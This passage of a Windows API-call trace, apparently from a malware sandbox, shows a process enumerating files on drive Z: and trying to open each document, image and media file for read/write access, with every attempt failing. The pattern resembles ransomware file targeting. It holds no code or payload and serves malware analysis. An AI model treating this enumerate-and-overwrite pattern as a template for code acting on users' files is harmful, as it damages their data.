RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.381] PathFindExtensionW (pszPath="Z:\\X18sQ2pVfY.mp3") returned=".mp3" [0185.386] CreateFileW (lpFileName="Z:\\X18sQ2pVfY.mp3" (normalized: "z:\\x18sq2pvfy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.388] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb1b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EOk7P095P.xls", cAlternateFileName="")) returned 1 [0185.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.388] PathFindExtensionW (pszPath="Z:\\EOk7P095P.xls") returned=".xls" [0185.393] CreateFileW (lpFileName="Z:\\EOk7P095P.xls" (normalized: "z:\\eok7p095p.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.395] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5bc5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BDK13uXlqscCs2sGFIQ.doc", cAlternateFileName="")) returned 1 [0185.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.395] PathFindExtensionW (pszPath="Z:\\BDK13uXlqscCs2sGFIQ.doc") returned=".doc" [0185.401] CreateFileW (lpFileName="Z:\\BDK13uXlqscCs2sGFIQ.doc" (normalized: "z:\\bdk13uxlqsccs2sgfiq.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.402] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14f79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ow3Vle4.swf", cAlternateFileName="")) returned 1 [0185.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.403] PathFindExtensionW (pszPath="Z:\\ow3Vle4.swf") returned=".swf" [0185.408] CreateFileW (lpFileName="Z:\\ow3Vle4.swf" (normalized: "z:\\ow3vle4.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.410] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11dda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KLUwMaQCvDlNDoCoQ3.xls", cAlternateFileName="")) returned 1 [0185.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.410] PathFindExtensionW (pszPath="Z:\\KLUwMaQCvDlNDoCoQ3.xls") returned=".xls" [0185.416] CreateFileW (lpFileName="Z:\\KLUwMaQCvDlNDoCoQ3.xls" (normalized: "z:\\kluwmaqcvdlndocoq3.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.449] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16f00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RBkxpRf3.m4a", cAlternateFileName="")) returned 1 [0185.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.528] PathFindExtensionW (pszPath="Z:\\RBkxpRf3.m4a") returned=".m4a" [0185.545] CreateFileW (lpFileName="Z:\\RBkxpRf3.m4a" (normalized: "z:\\rbkxprf3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.547] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15a45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OCVoNePy.png", cAlternateFileName="")) returned 1 [0185.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.547] PathFindExtensionW (pszPath="Z:\\OCVoNePy.png") returned=".png" [0185.551] CreateFileW (lpFileName="Z:\\OCVoNePy.png" (normalized: "z:\\ocvonepy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.553] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x166d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dPc6HLBDbx19XugtWM.jpg", cAlternateFileName="")) returned 1 [0185.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.553] PathFindExtensionW (pszPath="Z:\\dPc6HLBDbx19XugtWM.jpg") returned=".jpg" [0185.557] CreateFileW (lpFileName="Z:\\dPc6HLBDbx19XugtWM.jpg" (normalized: "z:\\dpc6hlbdbx19xugtwm.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.558] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16fbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywcd6Y1iM3n9j4GZ20Ya.png", cAlternateFileName="")) returned 1 [0185.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.558] PathFindExtensionW (pszPath="Z:\\ywcd6Y1iM3n9j4GZ20Ya.png") returned=".png" [0185.562] CreateFileW (lpFileName="Z:\\ywcd6Y1iM3n9j4GZ20Ya.png" (normalized: "z:\\ywcd6y1im3n9j4gz20ya.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.564] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x873d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3QVfoNUquygvYJYnxL.m4a", cAlternateFileName="")) returned 1 [0185.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.564] PathFindExtensionW (pszPath="Z:\\3QVfoNUquygvYJYnxL.m4a") returned=".m4a" [0185.569] CreateFileW (lpFileName="Z:\\3QVfoNUquygvYJYnxL.m4a" (normalized: "z:\\3qvfonuquygvyjynxl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.571] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc601, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AhsbCQy.csv", cAlternateFileName="")) returned 1 [0185.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.571] PathFindExtensionW (pszPath="Z:\\AhsbCQy.csv") returned=".csv" [0185.577] CreateFileW (lpFileName="Z:\\AhsbCQy.csv" (normalized: "z:\\ahsbcqy.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.578] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16e80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OpdqDACZhn.ots", cAlternateFileName="")) returned 1 [0185.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.578] PathFindExtensionW (pszPath="Z:\\OpdqDACZhn.ots") returned=".ots" [0185.584] CreateFileW (lpFileName="Z:\\OpdqDACZhn.ots" (normalized: "z:\\opdqdaczhn.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.586] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16ba0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xxTfgN.jpg", cAlternateFileName="")) returned 1 [0185.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.586] PathFindExtensionW (pszPath="Z:\\xxTfgN.jpg") returned=".jpg" [0185.592] CreateFileW (lpFileName="Z:\\xxTfgN.jpg" (normalized: "z:\\xxtfgn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.594] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xaeb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1HtpGhRDb.ots", cAlternateFileName="")) returned 1 [0185.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.594] PathFindExtensionW (pszPath="Z:\\1HtpGhRDb.ots") returned=".ots" [0185.599] CreateFileW (lpFileName="Z:\\1HtpGhRDb.ots" (normalized: "z:\\1htpghrdb.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.601] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11bb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tE4nVH8Z0MXjyxhaHaNx.pdf", cAlternateFileName="")) returned 1 [0185.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.601] PathFindExtensionW (pszPath="Z:\\tE4nVH8Z0MXjyxhaHaNx.pdf") returned=".pdf" [0185.606] CreateFileW (lpFileName="Z:\\tE4nVH8Z0MXjyxhaHaNx.pdf" (normalized: "z:\\te4nvh8z0mxjyxhahanx.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.610] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11d7a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IBowTJ.csv", cAlternateFileName="")) returned 1 [0185.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.610] PathFindExtensionW (pszPath="Z:\\IBowTJ.csv") returned=".csv" [0185.616] CreateFileW (lpFileName="Z:\\IBowTJ.csv" (normalized: "z:\\ibowtj.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.617] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9776, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CAYEd2GbRKcU4.jpg", cAlternateFileName="")) returned 1 [0185.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.617] PathFindExtensionW (pszPath="Z:\\CAYEd2GbRKcU4.jpg") returned=".jpg" [0185.623] CreateFileW (lpFileName="Z:\\CAYEd2GbRKcU4.jpg" (normalized: "z:\\cayed2gbrkcu4.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.625] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb6a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FPTqG3qP.ots", cAlternateFileName="")) returned 1 [0185.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.625] PathFindExtensionW (pszPath="Z:\\FPTqG3qP.ots") returned=".ots" [0185.629] CreateFileW (lpFileName="Z:\\FPTqG3qP.ots" (normalized: "z:\\fptqg3qp.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.630] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd2ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2cHgIoncB.wav", cAlternateFileName="")) returned 1 [0185.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.630] PathFindExtensionW (pszPath="Z:\\2cHgIoncB.wav") returned=".wav" [0185.635] CreateFileW (lpFileName="Z:\\2cHgIoncB.wav" (normalized: "z:\\2chgioncb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.637] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15b5b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BrKxpbhKKRTpU.docx", cAlternateFileName="")) returned 1 [0185.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.637] PathFindExtensionW (pszPath="Z:\\BrKxpbhKKRTpU.docx") returned=".docx" [0185.641] CreateFileW (lpFileName="Z:\\BrKxpbhKKRTpU.docx" (normalized: "z:\\brkxpbhkkrtpu.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.643] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14c86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8AEDnDa.avi", cAlternateFileName="")) returned 1 [0185.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.643] PathFindExtensionW (pszPath="Z:\\8AEDnDa.avi") returned=".avi" [0185.647] CreateFileW (lpFileName="Z:\\8AEDnDa.avi" (normalized: "z:\\8aednda.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.649] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12e32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fmkPuhgsIQDpQcV3y.ppt", cAlternateFileName="")) returned 1 [0185.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.649] PathFindExtensionW (pszPath="Z:\\fmkPuhgsIQDpQcV3y.ppt") returned=".ppt" [0185.656] CreateFileW (lpFileName="Z:\\fmkPuhgsIQDpQcV3y.ppt" (normalized: "z:\\fmkpuhgsiqdpqcv3y.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.658] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17bcf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oul9aMfiTm6Pt28KJ.xls", cAlternateFileName="")) returned 1 [0185.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.658] PathFindExtensionW (pszPath="Z:\\Oul9aMfiTm6Pt28KJ.xls") returned=".xls" [0185.667] CreateFileW (lpFileName="Z:\\Oul9aMfiTm6Pt28KJ.xls" (normalized: "z:\\oul9amfitm6pt28kj.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.674] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, 